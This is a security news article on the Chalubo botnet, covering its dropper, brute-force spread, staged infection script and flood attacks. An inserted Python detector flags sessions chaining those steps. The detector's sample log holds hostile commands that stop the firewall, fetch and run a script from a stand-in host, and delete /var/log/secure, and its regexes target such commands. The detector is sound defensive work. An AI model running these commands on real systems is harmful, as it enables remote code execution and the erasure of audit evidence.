Newly Discovered Chalubo Botnet Used as a DoS Weapon

The Chalubo botnet is a recently discovered malware that has been found to contain advanced features from other threats and to be used for DoS (denial-of-service) attack campaigns. At the moment several attacks have been spotted. Our article gives an overview of how the malware functions.

The Chalubo Botnet Is a Formidable DoS Weapon

A dangerous new malware called the Chalubo botnet has been discovered by a team of security researchers. Several iterations of it have been found to cause infections. The first versions linked to it were observed back in August, when three malicious components were used in an attack against x86 machines. This is believed to have been an early test attack, probably a way for the operators to fine-tune and tweak the botnet.

The Elknot dropper was later used to deliver a more complete version of the malware. The captured samples indicate that several variants of it are available, with specialist versions for each architecture. This makes it very effective against both servers and IoT devices.

In September a shift in the infection tactics was observed. Instead of the dropper, the malicious component depended on brute-force attacks against remote desktop services. The hackers loaded the infection script with default credentials and commonly used username and password combinations. Updated versions of the Chalubo botnet featured advanced anti-analysis code that protected them from being discovered by both administrators and security software. This is done by launching a hardcoded script that executes the following operations:

  1. Firewall Bypass
  2. Installation of the “wget” download utility if it is not present.
  3. Downloading of a second-stage script
  4. System modification
  5. Log Files Removal
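
As a defender's view of the script behaviour listed above, the following added example (not part of the original article and not derived from Chalubo samples) flags shell sessions that chain several of those steps. The log format, session ids, host names and command patterns are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed, generic Linux command patterns for four of the five steps; they are
# not indicators taken from Chalubo samples. "System modification" is too
# unspecific on the page to pattern-match and is left out.
STAGES = {
    "firewall_bypass": re.compile(
        r"iptables\s+(-F|--flush)\b|ufw\s+disable\b"
        r"|service\s+(iptables|firewalld)\s+stop\b"
        r"|systemctl\s+(stop|disable)\s+(firewalld|iptables|ufw)\b"),
    "wget_install": re.compile(
        r"\b(apt-get|apt|yum|dnf)\s+(-\S+\s+)*install\s+(-\S+\s+)*wget\b"),
    "stage2_fetch_and_run": re.compile(
        r"\bwget\b.*https?://\S+.*(?:[|;]|&&)\s*(?:ba)?sh\b"),
    "log_removal": re.compile(r"\brm\s+(-\S+\s+)*/var/log\b|\bhistory\s+-c\b"),
}

# Constructed log format: "<timestamp> session=<id> cmd=<command line>"
LINE = re.compile(r"^\S+\s+session=(\S+)\s+cmd=(.*)$")

# Constructed sample: session 41 chains the stages, session 77 is routine admin.
SAMPLE = """\
2024-01-01T03:12:01Z session=41 cmd=service iptables stop
2024-01-01T03:12:03Z session=41 cmd=yum -y install wget
2024-01-01T03:12:09Z session=41 cmd=wget -q http://stage2.example.invalid/s.sh -O /tmp/s.sh && sh /tmp/s.sh
2024-01-01T03:12:15Z session=41 cmd=rm -rf /var/log/secure
2024-01-01T09:30:00Z session=77 cmd=apt-get install -y wget
2024-01-01T09:31:00Z session=77 cmd=wget https://mirror.example.invalid/pkg.tar.gz
"""

def stages_by_session(text):
    """Map each session id to the stages seen, in first-seen order."""
    seen = defaultdict(list)
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # not in the expected format
        session, cmd = m.groups()
        for name, pattern in STAGES.items():
            if pattern.search(cmd) and name not in seen[session]:
                seen[session].append(name)
    return dict(seen)

def suspicious_sessions(text, min_stages=3):
    """One stage alone is normal admin work; several in one session is not."""
    hits = stages_by_session(text)
    return sorted(s for s, st in hits.items() if len(st) >= min_stages)
```

Requiring several stages within one session keeps ordinary package installs and downloads, such as session 77 in the sample, from raising alerts.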

What follows is the actual bot deployment. When started, it will connect to a specific hacker-controlled server and report the successful infection. The observed hacker instructions were to download other modules depending on the individual machine configuration. So far it seems that the Chalubo botnet is used to perform all basic DoS attacks: DNS, UDP and SYN floods against a given target. We anticipate that the attacks and further upgrades to its code base will continue. As the botnet is based on scripts and publicly available source code, there is the possibility that it will be sold or traded on the underground hacker marketplaces. As such, offspring versions can include more dangerous modules.

Martin Beltov

Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast he enjoys writing about the latest threats and mechanisms of intrusion.
